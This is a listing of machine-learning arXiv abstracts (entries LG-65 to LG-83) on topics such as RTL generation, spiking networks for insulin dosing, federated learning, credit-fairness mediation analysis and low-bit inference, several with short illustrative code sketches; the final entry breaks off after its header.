[LG-65] RTLSeek: Boosting the LLM-Based RTL Generation with Multi-Stage Diversity-Oriented Reinforcement Learning
链接: https://arxiv.org/abs/2603.27630
作者: Xinyu Zhang,Zhiteng Chao,Yonghao Wang,Bin Sun,Tianyun Ma,Tianmeng Yang,Jianan Mu,Jing Justin Ye,Huawei Li
类目: Hardware Architecture (cs.AR); Machine Learning (cs.LG)
*备注: 8 pages, 6 figures
Abstract:Register Transfer Level (RTL) design translates high-level specifications into hardware using HDLs such as Verilog. Although LLM-based RTL generation is promising, the scarcity of functionally verifiable high-quality data limits both accuracy and diversity. Existing post-training typically produces a single HDL implementation per specification, lacking awareness of RTL variations needed for different design goals. We propose RTLSeek, a post-training paradigm that applies rule-based Diversity-Oriented Reinforcement Learning to improve RTL correctness and diversity. Our Diversity-Centric Multi-Objective Reward Scheduling integrates expert knowledge with EDA feedback, and a three-stage framework maximizes the utility of limited data. Experiments on the RTLLM benchmark show that RTLSeek surpasses prior methods, with ablation results confirming that encouraging broader design-space exploration improves RTL quality and achieves the principle of “the more generated, the better results.” Implementation framework, including the dataset, source code, and model weights, is shown at this https URL.
[LG-66] Secure Reinforcement Learning: On Model-Free Detection of Man in the Middle Attacks
链接: https://arxiv.org/abs/2603.27592
作者: Rishi Rani,Massimo Franceschetti
类目: Systems and Control (eess.SY); Machine Learning (cs.LG)
*备注:
Abstract:We consider the problem of learning-based man-in-the-middle (MITM) attacks in cyber-physical systems (CPS), and extend our previously proposed Bellman Deviation Detection (BDD) framework for model-free reinforcement learning (RL). We refine the standard MDP attack model by allowing the reward function to depend on both the current and subsequent states, thereby capturing reward variations induced by errors in the adversary’s transition estimate. We also derive an optimal system-identification strategy for the adversary that minimizes detectable value deviations. Further, we prove that the agent’s asymptotic learning time required to secure the system scales linearly with the adversary’s learning time, and that this matches the optimal lower bound. Hence, the proposed detection scheme is order-optimal in detection efficiency. Finally, we extend the framework to asynchronous and intermittent attack scenarios, where reliable detection is preserved.
[LG-67] An Energy-Efficient Spiking Neural Network Architecture for Predictive Insulin Delivery
链接: https://arxiv.org/abs/2603.27589
作者: Sahil Shrivastava
类目: Machine Learning (cs.LG)
*备注: 10 pages, 6 figures, 12 tables. IEEE conference format. Independent Research
Abstract:Diabetes mellitus affects over 537 million adults worldwide. Insulin-dependent patients require continuous glucose monitoring and precise dose calculation while operating under strict power budgets on wearable devices. This paper presents PDDS - an in-silico, software-complete research prototype of an event-driven computational pipeline for predictive insulin dose calculation. Motivated by neuromorphic computing principles for ultra-low-power wearable edge devices, the core contribution is a three-layer Leaky Integrate-and-Fire (LIF) Spiking Neural Network trained on 128,025 windows from OhioT1DM (66.5% real patients) and the FDA-accepted UVa/Padova physiological simulator (33.5%), achieving 85.90% validation accuracy. We present three rigorously honest evaluations: (1) a standard test-set comparison against ADA threshold rules, bidirectional LSTM (99.06% accuracy), and MLP (99.00%), where the SNN achieves 85.24% - we demonstrate this gap reflects the stochastic encoding trade-off, not architectural failure; (2) a temporal benchmark on 426 non-obvious clinician-annotated hypoglycemia windows where neither the SNN (9.2% recall) nor the ADA rule (16.7% recall) performs adequately, identifying the system’s key limitation and the primary direction for future work; (3) a power-efficiency analysis showing the SNN requires 79,267x less energy per inference than the LSTM (1,551 Femtojoules vs. 122.9 nanojoules), justifying the SNN architecture for continuous wearable deployment. The system is not yet connected to physical hardware; it constitutes the computational middle layer of a five phase roadmap toward clinical validation. Keywords: spiking neural network, glucose severity classification, edge computing, hypoglycemia detection, event-driven architecture, LIF neuron, Poisson encoding, OhioT1DM, in-silico, neuromorphic, power efficiency.
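The Leaky Integrate-and-Fire neuron at the core of the PDDS pipeline can be sketched as follows; the time constant, threshold, and input currents are illustrative, not the trained model's values.

```python
# Toy Leaky Integrate-and-Fire (LIF) neuron, the unit the PDDS SNN is built
# from. Parameters are illustrative, not the paper's trained values.
def lif_run(input_current, tau=20.0, v_th=1.0, v_reset=0.0, dt=1.0):
    v = 0.0
    spikes = []
    for i in input_current:
        v += dt / tau * (-v + i)   # leaky integration toward the input
        if v >= v_th:              # threshold crossing emits a spike ...
            spikes.append(1)
            v = v_reset            # ... and resets the membrane
        else:
            spikes.append(0)
    return spikes

# A supra-threshold drive yields a regular spike train; a weak drive yields
# none. Event-driven hardware spends energy only on the 1s, which is where
# femtojoule-scale per-inference figures like those quoted above come from.
strong = lif_run([2.0] * 100)
weak = lif_run([0.05] * 100)
assert sum(strong) > 0 and sum(weak) == 0
```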
[LG-68] BLOSSOM: Block-wise Federated Learning Over Shared and Sparse Observed Modalities IJCNN
链接: https://arxiv.org/abs/2603.27552
作者: Pranav M R,Jayant Chandwani,Ahmed M. Abdelmoniem,Arnab K. Paul
类目: Machine Learning (cs.LG); Distributed, Parallel, and Cluster Computing (cs.DC)
*备注: 6 pages, 2 figures, 3 tables. Accepted to the International Joint Conference on Neural Networks (IJCNN) 2026
Abstract:Multimodal federated learning (FL) is essential for real-world applications such as autonomous systems and healthcare, where data is distributed across heterogeneous clients with varying and often missing modalities. However, most existing FL approaches assume uniform modality availability, limiting their applicability in practice. We introduce BLOSSOM, a task-agnostic framework for multimodal FL designed to operate under shared and sparsely observed modality conditions. BLOSSOM supports clients with arbitrary modality subsets and enables flexible sharing of model components. To address client and task heterogeneity, we propose a block-wise aggregation strategy that selectively aggregates shared components while keeping task-specific blocks private, enabling partial personalization. We evaluate BLOSSOM on multiple diverse multimodal datasets and analyse the effects of missing modalities and personalization. Our results show that block-wise personalization significantly improves performance, particularly in settings with severe modality sparsity. In modality-incomplete scenarios, BLOSSOM achieves an average performance gain of 18.7% over full-model aggregation, while in modality-exclusive settings the gain increases to 37.7%, highlighting the importance of block-wise learning for practical multimodal FL systems.
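The block-wise aggregation idea can be sketched as a FedAvg variant that averages only shared blocks; the block names, layout, and handling of absent modalities below are hypothetical simplifications, not BLOSSOM's actual implementation.

```python
import numpy as np

# Toy block-wise aggregation: shared encoder blocks are averaged across
# clients, while task-specific head blocks stay private to each client.
SHARED = {"img_enc", "txt_enc"}   # aggregated; everything else stays private

def blockwise_aggregate(client_models):
    """FedAvg over shared blocks only; private blocks are returned untouched."""
    agg = {}
    for name in SHARED:
        # Only clients that actually hold this modality block contribute,
        # which is how sparsely observed modalities are accommodated.
        parts = [m[name] for m in client_models if name in m]
        if parts:
            agg[name] = np.mean(parts, axis=0)
    out = []
    for m in client_models:
        new = dict(m)
        new.update({k: v for k, v in agg.items() if k in m})
        out.append(new)
    return out

# Client 0 lacks the text modality entirely; its model has no txt_enc block.
clients = [
    {"img_enc": np.ones(3), "head": np.zeros(2)},
    {"img_enc": 3 * np.ones(3), "txt_enc": np.ones(3), "head": np.ones(2)},
]
updated = blockwise_aggregate(clients)
assert np.allclose(updated[0]["img_enc"], 2.0)   # shared block averaged
assert np.allclose(updated[0]["head"], 0.0)      # private block untouched
```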
[LG-69] Visualization of Machine Learning Models through Their Spatial and Temporal Listeners
链接: https://arxiv.org/abs/2603.27527
作者: Siyu Wu,Lei Shi,Lei Xia,Cenyang Wu,Zipeng Liu,Yingchaojie Feng,Liang Zhou,Wei Chen
类目: Machine Learning (cs.LG)
*备注:
Abstract:Model visualization (ModelVis) has emerged as a major research direction, yet existing taxonomies are largely organized by data or tasks, making it difficult to treat models as first-class analysis objects. We present a model-centric two-stage framework that employs abstract listeners to capture spatial and temporal model behaviors, and then connects the translated model behavior data to the classical InfoVis pipeline. To apply the framework at scale, we build a retrieval-augmented human–large language model (LLM) extraction workflow and curate a corpus of 128 VIS/VAST ModelVis papers with 331 coded figures. Our analysis shows a dominant result-centric priority on visualizing model outcomes, quantitative/nominal data types, statistical charts, and performance evaluation. Citation-weighted trends further indicate that the less frequent model-mechanism-oriented studies have disproportionately high impact yet have been less investigated recently. Overall, the framework is a general approach for comparing existing ModelVis systems and guiding possible future designs.
[LG-70] Q-BIOLAT: Binary Latent Protein Fitness Landscapes for QUBO-Based Optimization
链接: https://arxiv.org/abs/2603.27526
作者: Truong-Son Hy
类目: Machine Learning (cs.LG)
*备注:
Abstract:Protein fitness optimization is inherently a discrete combinatorial problem, yet most learning-based approaches rely on continuous representations and are primarily evaluated through predictive accuracy. We introduce Q-BIOLAT, a framework for modeling and optimizing protein fitness landscapes in compact binary latent spaces. Starting from pretrained protein language model embeddings, we construct binary latent representations and learn a quadratic unconstrained binary optimization (QUBO) surrogate that captures unary and pairwise interactions. Beyond its formulation, Q-BIOLAT provides a representation-centric perspective on protein fitness modeling. We show that representations with similar predictive performance can induce fundamentally different optimization landscapes. In particular, learned autoencoder-based representations collapse after binarization, producing degenerate latent spaces that fail to support combinatorial search, whereas simple structured representations such as PCA yield high-entropy, decodable, and optimization-friendly latent spaces. Across multiple datasets and data regimes, we demonstrate that classical combinatorial optimization methods, including simulated annealing, genetic algorithms, and greedy hill climbing, are highly effective in structured binary latent spaces. By expressing the objective in QUBO form, our approach connects modern machine learning with discrete and quantum-inspired optimization. Our implementation and dataset are publicly available at: this https URL
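The combinatorial search the paper runs over its QUBO surrogate can be sketched with plain simulated annealing over bit vectors; the Q matrix here is random noise standing in for the learned unary/pairwise fitness terms, so this is an illustration of the search primitive, not the paper's code.

```python
import numpy as np

# Toy simulated annealing over a QUBO objective x^T Q x with x in {0,1}^n.
rng = np.random.default_rng(1)
n = 12
Q = rng.standard_normal((n, n))
Q = (Q + Q.T) / 2                  # symmetric QUBO matrix

def energy(x):
    return x @ Q @ x

def anneal(steps=2000, t0=2.0):
    x = rng.integers(0, 2, n)
    best, best_e = x.copy(), energy(x)
    for s in range(steps):
        t = t0 * (1 - s / steps) + 1e-3      # linear cooling schedule
        i = rng.integers(n)
        y = x.copy()
        y[i] ^= 1                            # single-bit-flip proposal
        d = energy(y) - energy(x)
        # Accept downhill moves always, uphill moves with prob e^{-d/t}.
        if d < 0 or rng.random() < np.exp(-d / t):
            x = y
            if energy(x) < best_e:
                best, best_e = x.copy(), energy(x)
    return best, best_e

x_best, e_best = anneal()
assert e_best == energy(x_best)              # bookkeeping is consistent
assert set(np.unique(x_best)) <= {0, 1}      # solution stays binary
```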
[LG-71] Match or Replay: Self Imitating Proximal Policy Optimization
链接: https://arxiv.org/abs/2603.27515
作者: Gaurav Chaudhary,Laxmidhar Behera,Washim Uddin Mondal
类目: Machine Learning (cs.LG)
*备注:
Abstract:Reinforcement Learning (RL) agents often struggle with inefficient exploration, particularly in environments with sparse rewards. Traditional exploration strategies can lead to slow learning and suboptimal performance because agents fail to systematically build on previously successful experiences, thereby reducing sample efficiency. To tackle this issue, we propose a self-imitating on-policy algorithm that enhances exploration and sample efficiency by leveraging past high-reward state-action pairs to guide policy updates. Our method incorporates self-imitation by using optimal transport distance in dense reward environments to prioritize state visitation distributions that match the most rewarding trajectory. In sparse-reward environments, we uniformly replay successful self-encountered trajectories to facilitate structured exploration. Experimental results across diverse environments demonstrate substantial improvements in learning efficiency, including MuJoCo for dense rewards and the partially observable 3D Animal-AI Olympics and multi-goal PointMaze for sparse rewards. Our approach achieves faster convergence and significantly higher success rates compared to state-of-the-art self-imitating RL baselines. These findings underscore the potential of self-imitation as a robust strategy for enhancing exploration in RL, with applicability to more complex tasks.
[LG-72] Decomposing Discrimination: Causal Mediation Analysis for AI-Driven Credit Decisions
链接: https://arxiv.org/abs/2603.27510
作者: Duraimurugan Rajamanickam
类目: Machine Learning (cs.LG)
*备注: 22 pages, 6 figures, 2 tables. Open-source code at this https URL
Abstract:Statistical fairness metrics in AI-driven credit decisions conflate two causally distinct mechanisms: discrimination operating directly from a protected attribute to a credit outcome, and structural inequality propagating through legitimate financial features. We formalise this distinction using Pearl’s framework of natural direct and indirect effects applied to the credit decision setting. Our primary theoretical contribution is an identification strategy for natural direct and indirect effects under treatment-induced confounding – the prevalent setting in which protected attributes causally affect both financial mediators and the final decision, violating standard sequential ignorability. We show that interventional direct and indirect effects (IDE/IIE) are identified under the weaker Modified Sequential Ignorability assumption, and prove that IDE/IIE provide conservative bounds on the unidentified natural effects under monotone indirect treatment response. We propose a doubly-robust augmented inverse probability weighted (AIPW) estimator for IDE/IIE with semiparametric efficiency properties, implemented via cross-fitting. An E-value sensitivity analysis addresses residual confounding on the direct pathway. Empirical evaluation on 89,465 real HMDA conventional purchase mortgage applications from New York State (2022) demonstrates that approximately 77% of the observed 7.9 percentage-point racial denial disparity operates through financial mediators shaped by structural inequality, while the remaining 23% constitutes a conservative lower bound on direct discrimination. The open-source CausalFair Python package implements the full pipeline for deployment at resource-constrained financial institutions.
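The direct/indirect decomposition can be made concrete with a linear structural model, a deliberately simple stand-in for the paper's doubly-robust AIPW estimator: in the linear case the direct effect is the coefficient b and the indirect effect is a·c, and the two sum to the total effect.

```python
import numpy as np

# Toy linear mediation model: A is the protected attribute, M a financial
# mediator, Y the decision score. All coefficients are illustrative.
rng = np.random.default_rng(2)
n = 50_000
a, b, c = 1.5, 0.4, 0.8                  # true structural coefficients

A = rng.integers(0, 2, n).astype(float)
M = a * A + rng.standard_normal(n)       # mediator shaped by A
Y = b * A + c * M + rng.standard_normal(n)

total = np.polyfit(A, Y, 1)[0]           # total effect: regress Y on A alone
X = np.column_stack([A, M, np.ones(n)])  # control for the mediator
coef, *_ = np.linalg.lstsq(X, Y, rcond=None)
direct = coef[0]                         # effect of A holding M fixed
indirect = total - direct                # effect routed through M

assert abs(direct - b) < 0.1             # recovers b = 0.4
assert abs(indirect - a * c) < 0.1       # recovers a*c = 1.2
```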
[LG-73] Variational Learning of Fractional Posteriors
链接: https://arxiv.org/abs/2603.27488
作者: Kian Ming A. Chai,Edwin V. Bonilla
类目: Machine Learning (cs.LG)
*备注: Initial version in Proceedings of the 42nd International Conference on Machine Learning, Vancouver, Canada. PMLR 267, 2025. This version contains a correction for Lemma A.1 and amendments to two surrounding texts: see the last page of the paper at the accompanying github website
Abstract:We introduce a novel one-parameter variational objective that lower bounds the data evidence and enables the estimation of approximate fractional posteriors. We extend this framework to hierarchical construction and Bayes posteriors, offering a versatile tool for probabilistic modelling. We demonstrate two cases where gradients can be obtained analytically and a simulation study on mixture models showing that our fractional posteriors can be used to achieve better calibration compared to posteriors from the conventional variational bound. When applied to variational autoencoders (VAEs), our approach attains higher evidence bounds and enables learning of high-performing approximate Bayes posteriors jointly with fractional posteriors. We show that VAEs trained with fractional posteriors produce decoders that are better aligned for generation from the prior.
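What a fractional posterior is can be shown in closed form for a Gaussian mean with known unit variance: tempering the likelihood by a power beta in (0, 1] acts like an effective sample size of beta * n and widens the posterior. This sketch illustrates the target object only, not the paper's variational bound.

```python
import numpy as np

# Closed-form fractional (tempered) posterior for a Gaussian mean:
# p_beta(mu | x) ∝ p(x | mu)^beta p(mu), with a Gaussian prior.
rng = np.random.default_rng(6)
x = rng.standard_normal(30) + 2.0        # data with true mean 2.0
n, xbar = len(x), x.mean()

def fractional_posterior(beta, prior_var=100.0):
    # Conjugate Gaussian update with likelihood precision scaled by beta.
    post_var = 1.0 / (1.0 / prior_var + beta * n)
    post_mean = post_var * beta * n * xbar
    return post_mean, post_var

m1, v1 = fractional_posterior(beta=1.0)          # ordinary Bayes posterior
m_half, v_half = fractional_posterior(beta=0.5)  # fractional posterior

assert v_half > v1                  # tempering inflates posterior uncertainty
assert abs(m1 - xbar) < 0.1         # near-flat prior: mean ~ sample mean
```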
[LG-74] RSR-core: A High-Performance Engine for Low-Bit Matrix-Vector Multiplication
链接: https://arxiv.org/abs/2603.27462
作者: Mohsen Dehghankar,Abolfazl Asudeh
类目: Data Structures and Algorithms (cs.DS); Machine Learning (cs.LG); Performance (cs.PF)
*备注:
Abstract:Matrix-vector multiplication is a fundamental building block in neural networks, vector databases, and large language models, particularly during inference. As a result, efficient matrix-vector multiplication engines directly translate into more efficient inference. Recent work has explored low-bit quantization of model weights, where matrices are represented using binary (1-bit) or ternary (1.58-bit) values while activation is kept in higher precision. These representations enable efficient hardware-level computation. In parallel, algorithms such as Redundant Segment Reduction (RSR) provide theoretical guarantees for accelerating low-bit matrix-vector multiplication. However, existing implementations operate at the application level and cannot be efficiently integrated into hardware kernels, limiting practical performance. To bridge this gap, we present RSR-core, a high-performance engine that implements the RSR algorithm as optimized low-level kernels for both CPU and CUDA environments. RSR-core supports efficient matrix-vector multiplication for binary and ternary weight matrices and general vectors while enabling practical deployment of RSR algorithm in real inference pipelines. RSR-core is provided as a production-ready engine with HuggingFace integration for preprocessing low-bit models and running accelerated inference. Experimental results demonstrate significant performance improvements over baseline HuggingFace PyTorch multiplication, achieving up to 62x speedup on CPU and up to 1.9x speedup for token generation on CUDA for popular ternary LLMs. The source code is publicly available at this https URL.
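The low-bit setting that RSR-core accelerates can be illustrated directly: with ternary weights in {-1, 0, +1}, every output coordinate reduces to a difference of two sums of activation entries, with no multiplications at all. This sketch shows the setting, not the RSR segment-reduction algorithm itself.

```python
import numpy as np

# Multiplication-free matvec for a ternary weight matrix: each output is
# (sum of x where weight is +1) minus (sum of x where weight is -1).
rng = np.random.default_rng(3)
m, n = 8, 16
W = rng.integers(-1, 2, size=(m, n))     # ternary weight matrix in {-1,0,+1}
x = rng.standard_normal(n)               # full-precision activations

def ternary_matvec(W, x):
    out = np.empty(W.shape[0])
    for i, row in enumerate(W):
        pos = x[row == 1].sum()          # add where weight is +1
        neg = x[row == -1].sum()         # add where weight is -1
        out[i] = pos - neg               # multiplication-free dot product
    return out

assert np.allclose(ternary_matvec(W, x), W @ x)
```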
[LG-75] FlowRL: A Taxonomy and Modular Framework for Reinforcement Learning with Diffusion Policies
链接: https://arxiv.org/abs/2603.27450
作者: Chenxiao Gao,Edward Chen,Tianyi Chen,Bo Dai
类目: Machine Learning (cs.LG)
*备注: preprint
Abstract:Thanks to their remarkable flexibility, diffusion models and flow models have emerged as promising candidates for policy representation. However, efficient reinforcement learning (RL) upon these policies remains a challenge due to the lack of explicit log-probabilities for vanilla policy gradient estimators. While numerous attempts have been proposed to address this, the field lacks a unified perspective to reconcile these seemingly disparate methods, thus hampering ongoing development. In this paper, we bridge this gap by introducing a comprehensive taxonomy for RL algorithms with diffusion/flow policies. To support reproducibility and agile prototyping, we introduce a modular, JAX-based open-source codebase that leverages JIT-compilation for high-throughput training. Finally, we provide systematic and standardized benchmarks across Gym-Locomotion, DeepMind Control Suite, and IsaacLab, offering a rigorous side-by-side comparison of diffusion-based methods and guidance for practitioners to choose proper algorithms based on the application. Our work establishes a clear foundation for understanding and algorithm design, a high-efficiency toolkit for future research in the field, and an algorithmic guideline for practitioners in generative models and robotics. Our code is available at this https URL.
[LG-76] Interpretable Physics Extraction from Data for Linear Dynamical Systems using Lie Generator Networks
链接: https://arxiv.org/abs/2603.27442
作者: Shafayeth Jamil,Rehan Kapadia
类目: Machine Learning (cs.LG); Systems and Control (eess.SY)
*备注: 20 pages, 6 figures
Abstract:When the system is linear, why should learning be nonlinear? Linear dynamical systems, the analytical backbone of control theory, signal processing and circuit analysis, have exact closed-form solutions via the state transition matrix. Yet when system parameters must be inferred from data, recent neural approaches offer flexibility at the cost of physical guarantees: Neural ODEs provide flexible trajectory approximation but may violate physical invariants, while energy preserving architectures do not natively represent dissipation essential to real-world systems. We introduce Lie Generator Networks (LGN), which learn a structured generator A and compute trajectories directly via matrix exponentiation. This shift from integration to exponentiation preserves structure by construction. By parameterizing A = S - D (skew-symmetric minus positive diagonal), stability and dissipation emerge from the underlying architecture and are not introduced during training via the loss function. LGN provides a unified framework for linear conservative, dissipative, and time-varying systems. On a 100-dimensional stable RLC ladder, standard derivative-based least-squares system identification can yield unstable eigenvalues. The unconstrained LGN yields stable but physically incorrect spectra, whereas LGN-SD recovers all 100 eigenvalues with over two orders of magnitude lower mean eigenvalue error than unconstrained alternatives. Critically, these eigenvalues reveal poles, natural frequencies, and damping ratios which are interpretable physics that black-box networks do not provide.
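The A = S - D parameterization and the exponentiation-instead-of-integration step can be sketched with NumPy and SciPy (dimensions and damping values are illustrative): for any eigenvector v, Re(lambda) = -v*Dv/|v|^2 < 0, so stability holds by construction, as the abstract claims.

```python
import numpy as np
from scipy.linalg import expm

# Toy LGN generator A = S - D: S skew-symmetric (oscillation), D positive
# diagonal (dissipation). Trajectories come from matrix exponentiation,
# x(t) = expm(A t) @ x0, rather than numerical ODE integration.
rng = np.random.default_rng(4)
n = 6
R = rng.standard_normal((n, n))
S = R - R.T                               # skew-symmetric part
D = np.diag(rng.uniform(0.1, 1.0, n))     # positive diagonal damping
A = S - D

# Stability is architectural, not trained: all eigenvalues sit in the
# left half-plane because the skew part contributes no real component.
assert np.max(np.linalg.eigvals(A).real) < 0

x0 = rng.standard_normal(n)
x1 = expm(A * 1.0) @ x0                   # state after t = 1
x5 = expm(A * 5.0) @ x0                   # state after t = 5
# Dissipation shrinks the state norm monotonically along the trajectory.
assert np.linalg.norm(x5) < np.linalg.norm(x1) < np.linalg.norm(x0)
```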
[LG-77] The Geometric Cost of Normalization: Affine Bounds on the Bayesian Complexity of Neural Networks
链接: https://arxiv.org/abs/2603.27432
作者: Sungbae Chun
类目: Machine Learning (cs.LG); Information Theory (cs.IT)
*备注: 12 pages, 2 figures
Abstract:LayerNorm and RMSNorm impose fundamentally different geometric constraints on their outputs - and this difference has a precise, quantifiable consequence for model complexity. We prove that LayerNorm’s mean-centering step, by confining data to a linear hyperplane (through the origin), reduces the Local Learning Coefficient (LLC) of the subsequent weight matrix by exactly m/2 (where m is its output dimension); RMSNorm’s projection onto a sphere preserves the LLC entirely. This reduction is structurally guaranteed before any training begins, determined by data manifold geometry alone. The underlying condition is a geometric threshold: for the codimension-one manifolds we study, the LLC drop is binary – any non-zero curvature, regardless of sign or magnitude, is sufficient to preserve the LLC, while only affinely flat manifolds cause the drop. At finite sample sizes this threshold acquires a smooth crossover whose width depends on how much of the data distribution actually experiences the curvature, not merely on whether curvature exists somewhere. We verify both predictions experimentally with controlled single-layer scaling experiments using the wrLLC framework. We further show that Softmax simplex data introduces a “smuggled bias” that activates the same m/2 LLC drop when paired with an explicit downstream bias, proved via the affine symmetry extension of the main theorem and confirmed empirically.
[LG-78] Kempe Swap K-Means: A Scalable Near-Optimal Solution for Semi-Supervised Clustering
链接: https://arxiv.org/abs/2603.27417
作者: Yuxuan Ren,Shijie Deng
类目: Machine Learning (cs.LG)
*备注: 42 pages
Abstract:This paper presents a novel centroid-based heuristic algorithm, termed Kempe Swap K-Means, for constrained clustering under rigid must-link (ML) and cannot-link (CL) constraints. The algorithm employs a dual-phase iterative process: an assignment step that utilizes Kempe chain swaps to refine current clustering in the constrained solution space and a centroid update step that computes optimal cluster centroids. To enhance global search capabilities and avoid local optima, the framework incorporates controlled perturbations during the update phase. Empirical evaluations demonstrate that the proposed method achieves near-optimal partitions while maintaining high computational efficiency and scalability. The results indicate that Kempe Swap K-Means consistently outperforms state-of-the-art benchmarks in both clustering accuracy and algorithmic efficiency for large-scale datasets.
[LG-79] Rainbow-DemoRL: Combining Improvements in Demonstration-Augmented Reinforcement Learning ICRA2026
链接: https://arxiv.org/abs/2603.27400
作者: Dwait Bhatt,Shih-Chieh Chou,Nikolay Atanasov
类目: Robotics (cs.RO); Machine Learning (cs.LG)
*备注: Accepted to ICRA 2026
Abstract:Several approaches have been proposed to improve the sample efficiency of online reinforcement learning (RL) by leveraging demonstrations collected offline. The offline data can be used directly as transitions to optimize RL objectives, or offline policy and value functions can first be learned from the data and then used for online finetuning or to provide reference actions. While each of these strategies has shown compelling results, it is unclear which method has the most impact on sample efficiency, whether these approaches can be combined, and if there are cumulative benefits. We classify existing demonstration-augmented RL approaches into three categories and perform an extensive empirical study of their strengths, weaknesses, and combinations to isolate the contribution of each strategy and determine effective hybrid combinations for sample-efficient online RL. Our analysis reveals that directly reusing offline data and initializing with behavior cloning consistently outperform more complex offline RL pretraining methods for improving online sample efficiency.
[LG-80] K-Means Based TinyML Anomaly Detection and Distributed Model Reuse via the Distributed Internet of Learning (DIoL) SATC2026
链接: https://arxiv.org/abs/2603.27393
作者: Abdulrahman Albaiz,Fathi Amsaad
类目: Machine Learning (cs.LG)
*备注: SaTC 2026 Conference
Abstract:This paper presents a lightweight K-Means anomaly detection model and a distributed model-sharing workflow designed for resource-constrained microcontrollers (MCUs). Using real power measurements from a mini-fridge appliance, the system performs on-device feature extraction, clustering, and threshold estimation to identify abnormal appliance behavior. To avoid retraining models on every device, we introduce the Distributed Internet of Learning (DIoL), which enables a model trained on one MCU to be exported as a portable, text-based representation and reused directly on other devices. A two-device prototype demonstrates the feasibility of the “Train Once, Share Everywhere” (TOSE) approach using a real-world appliance case study, where Device A trains the model and Device B performs inference without retraining. Experimental results show consistent anomaly detection behavior, negligible parsing overhead, and identical inference runtimes between standalone and DIoL-based operation. The proposed framework enables scalable, low-cost TinyML deployment across fleets of embedded devices.
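The "Train Once, Share Everywhere" workflow can be sketched as follows, assuming a plain-text export format; the paper's actual text representation is not specified, and the helper names here are hypothetical:

```python
import numpy as np

def fit_kmeans(X, k=2, iters=20, seed=0):
    """Tiny Lloyd's k-means (no external ML library, in the MCU spirit)."""
    rng = np.random.default_rng(seed)
    C = X[rng.choice(len(X), k, replace=False)]
    for _ in range(iters):
        labels = np.argmin(((X[:, None] - C[None]) ** 2).sum(-1), axis=1)
        C = np.array([X[labels == j].mean(0) if (labels == j).any() else C[j]
                      for j in range(k)])
    return C

def export_model(C, threshold):
    """Portable text form: one centroid per line, then the threshold."""
    rows = [",".join(f"{v:.6f}" for v in c) for c in C]
    return "\n".join(rows) + f"\nthreshold={threshold:.6f}"

def import_model(text):
    *rows, last = text.strip().split("\n")
    C = np.array([[float(v) for v in r.split(",")] for r in rows])
    return C, float(last.split("=")[1])

def is_anomaly(x, C, threshold):
    """Flag a reading whose distance to the nearest centroid exceeds the threshold."""
    return float(np.min(((C - x) ** 2).sum(-1)) ** 0.5) > threshold
```

Device A would call fit_kmeans and export_model; Device B only needs import_model and is_anomaly, with no retraining.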
[LG-81] Active In-Context Learning for Tabular Foundation Models
链接: https://arxiv.org/abs/2603.27385
作者: Wilailuck Treerath,Fabrizio Pittorino
类目: Machine Learning (cs.LG)
*备注: 8 pages, 4 figures, 6 tables
Abstract:Active learning (AL) reduces labeling cost by querying informative samples, but in tabular settings its cold-start gains are often limited because uncertainty estimates are unreliable when models are trained on very few labels. Tabular foundation models such as TabPFN provide calibrated probabilistic predictions via in-context learning (ICL), i.e., without task-specific weight updates, enabling an AL regime in which the labeled context - rather than parameters - is iteratively optimized. We formalize Tabular Active In-Context Learning (Tab-AICL) and instantiate it with four acquisition rules: uncertainty (TabPFN-Margin), diversity (TabPFN-Coreset), an uncertainty-diversity hybrid (TabPFN-Hybrid), and a scalable two-stage method (TabPFN-Proxy-Hybrid) that shortlists candidates using a lightweight linear proxy before TabPFN-based selection. Across 20 classification benchmarks, Tab-AICL improves cold-start sample efficiency over retrained gradient-boosting baselines (CatBoost-Margin and XGBoost-Margin), measured by normalized AULC up to 100 labeled samples.
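The TabPFN-Margin acquisition rule described above can be sketched as follows, with the predictive probabilities standing in for TabPFN's in-context output (function name hypothetical):

```python
import numpy as np

def margin_acquire(proba, batch_size=5):
    """Select the unlabeled rows with the smallest top-2 probability margin.

    proba: (n, n_classes) predictive probabilities from the in-context
    model fit on the current labeled context (a stand-in for TabPFN here).
    """
    part = np.sort(proba, axis=1)
    margin = part[:, -1] - part[:, -2]      # small margin = uncertain
    return np.argsort(margin)[:batch_size]
```

In the Tab-AICL loop, the queried rows would be moved from the pool into the labeled context and the in-context prediction refreshed, with no weight updates.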
[LG-82] Embedding Provenance in Computer Vision Datasets with JSON-LD
链接: https://arxiv.org/abs/2603.27348
作者: Lynn Vonderhaar,Timothy Elvira,Tyler Thomas Procko,Omar Ochoa
类目: Machine Learning (cs.LG)
*备注:
Abstract:With the ubiquity of computer vision in industry, the importance of image provenance is becoming more apparent. Provenance provides information about the origin and derivation of some resource, e.g., an image dataset, enabling users to trace data changes to better understand the expected behaviors of downstream models trained on such data. Provenance may also help with data maintenance by ensuring compliance, supporting audits and improving reusability. Typically, if provided, provenance is stored separately, e.g., within a text file, leading to a loss of descriptive information for key details like image capture settings, data preprocessing steps, and model architecture or iteration. Images often lack the information detailing the parameters of their creation or compilation. This paper proposes a novel schema designed to structure image provenance in a manageable and coherent format. The approach utilizes JavaScript Object Notation for Linked Data (JSON-LD), embedding this provenance directly within the image file. This offers two significant benefits: (1) it aligns image descriptions with a robust schema inspired by and linked to established standards, and (2) it ensures that provenance remains intrinsically tied to images, preventing loss of information and enhancing system qualities, e.g., maintainability and adaptability. This approach emphasizes maintaining the direct connection between vision resources and their provenance.
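A minimal sketch of a JSON-LD provenance record of the kind described, using vocabulary loosely modeled on PROV-O terms rather than the paper's exact schema (field names are illustrative):

```python
import json

def make_provenance(camera, preprocessing, source_dataset):
    """Build a JSON-LD provenance record for an image.

    The @context maps the short field names onto PROV-O IRIs; the
    capture/preprocessing fields are illustrative placeholders.
    """
    record = {
        "@context": {
            "prov": "http://www.w3.org/ns/prov#",
            "wasDerivedFrom": "prov:wasDerivedFrom",
            "wasGeneratedBy": "prov:wasGeneratedBy",
        },
        "@type": "prov:Entity",
        "wasDerivedFrom": source_dataset,
        "wasGeneratedBy": {
            "@type": "prov:Activity",
            "captureSettings": camera,
            "preprocessing": preprocessing,
        },
    }
    return json.dumps(record, indent=2)
```

The serialized string could then be written into the image container itself (e.g. a PNG text chunk or an EXIF field) so the provenance travels with the file, which is the paper's central point.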
[LG-83] Scalable Maximum Entropy Population Synthesis via Persistent Contrastive Divergence
链接: https://arxiv.org/abs/2603.27312
作者: Mirko Degli Esposti
类目: Machine Learning (cs.LG)
*备注:
